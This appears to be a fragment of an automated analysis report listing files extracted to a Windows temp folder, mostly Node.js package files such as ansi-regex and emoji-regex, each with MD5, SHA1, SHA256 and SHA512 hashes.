SHA512 37be93a008f964cfdd4c92401e8a9b815ce51b6b5c8c711e0fbcabc119235d1f352a26c9d03c4203ef82e696c28606762474dfd5efc960e6b6df1afd47465729

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\package.json

MD5 d2894a8ebbc4840e85527b8c051dac86
SHA1 dabd0c9882fb3b8c12222595fb92ad26b60671a1
SHA256 8a331bebfc9225b6afe7a15542843a78ba7943454b6261cfe60b734513e1d32c
SHA512 7266a2f0bbbc398c5e4a4f2d66670a205d1cd35f0d11a89840b56f221057776bdb54723d7d767ddbd1861379c01ac660fbbeb36dbb5374e53756ae9afbc63e8c

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\index.js

MD5 4b05188fff08c3f12812c29561915d54
SHA1 bd2dec3594c15a8ed8cc9d45ee8c2a6fdedcfb37
SHA256 110c5fe554eccdda9b95be9a33edd4d4e867c8432460a8f39c9b7ff841b00772
SHA512 894b656903a1875c37c5d7cd9aa14fa7613961ffdbebc3ceda6d9ba766d46faf9369a811827389f6dcc101e65a7c935fb83e40aa707453fb203a675752370670

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\package.json

MD5 4a14d4b54700538e3369c29f7e6f2379
SHA1 238c48183550d02ab5c0dd37e13d57006dce640a
SHA256 181fa046bdbb7d8958c57dcef2e63aea9af667036e218c7222479a8618375f1a
SHA512 d8234b8d250ca8f5a7fc6ca2d37a410824e1f9fd13decbbe488cd59bf138ade96f91eb712825539f84245fb6f1a2f784159c8a9d19ca880dc2710661e3282f30